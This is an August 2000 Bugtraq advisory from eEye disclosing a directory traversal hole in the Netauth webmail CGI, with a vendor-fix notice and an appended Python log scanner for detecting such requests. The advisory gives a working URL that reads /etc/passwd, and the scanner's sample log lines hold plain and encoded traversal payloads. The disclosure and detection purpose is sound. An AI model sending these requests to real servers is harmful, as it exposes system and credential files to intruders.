Date: Thu, 17 Aug 2000 12:11:17 +0100
From: Marc Maiffret <marc@EEYE.COM>
Subject: Netauth: Web Based Email Management System
To: BUGTRAQ@SECURITYFOCUS.COM

This is just a quick note of a simple hole in the Netauth system.

What is Netauth?
Netauth is a web based eMail management system for Windows NT and most Unix platforms.

What is the hole?
The netauth.cgi file
http://[server]/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd

What is the fix?
The Netauth developers (very cool guys) fixed this hole a few months back. So just go to their website and download the latest version.

Vendor Homepage: http://netwinsite.com/netauth/

We found this hole while testing CHAM HTTP, few more weeks till release.
http://www.eeye.com/retina

Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.349.9062
F.949.349.9538
http://eEye.com
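
Added example, not part of the original post and not Netauth's code: a check a defender could run over web server access logs to find requests to netauth.cgi whose page parameter leaves its directory, as in the URL above. The log lines are constructed, the common log format is an assumption about the server, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (common log format assumed); not from the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Aug/2000:12:00:01 +0100] "GET /cgi-bin/netauth.cgi?cmd=show&page=help.html HTTP/1.0" 200 812
192.0.2.44 - - [17/Aug/2000:12:00:07 +0100] "GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../etc/passwd HTTP/1.0" 200 1432
192.0.2.44 - - [17/Aug/2000:12:00:09 +0100] "GET /cgi-bin/netauth.cgi?cmd=show&page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.0" 200 1432
192.0.2.44 - - [17/Aug/2000:12:00:11 +0100] "GET /cgi-bin/netauth.cgi?cmd=show&page=%252e%252e%255csecret.txt HTTP/1.0" 404 0
192.0.2.77 - - [17/Aug/2000:12:00:15 +0100] "GET /index.html?page=../x HTTP/1.0" 200 99
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded sequences are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(page):
    """True if the page value climbs out of its directory or is an absolute path."""
    path = fully_decode(page).replace("\\", "/")
    return (path.startswith("/")
            or ".." in path.split("/")
            or re.match(r"[A-Za-z]:", path) is not None)

def find_traversal_requests(log_text, script="netauth.cgi"):
    """Return (client, status, decoded page) for suspicious requests to the script."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # line is not in the assumed log format
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue  # only requests to the CGI named in the advisory
        for page in parse_qs(url.query).get("page", []):
            if is_traversal(page):
                hits.append((client, int(status), fully_decode(page)))
    return hits

if __name__ == "__main__":
    for client, status, page in find_traversal_requests(SAMPLE_LOG):
        print(f"{client} status={status} page={page!r}")
```

Hits that were answered with status 200 are the ones to review first, since the server returned content for them.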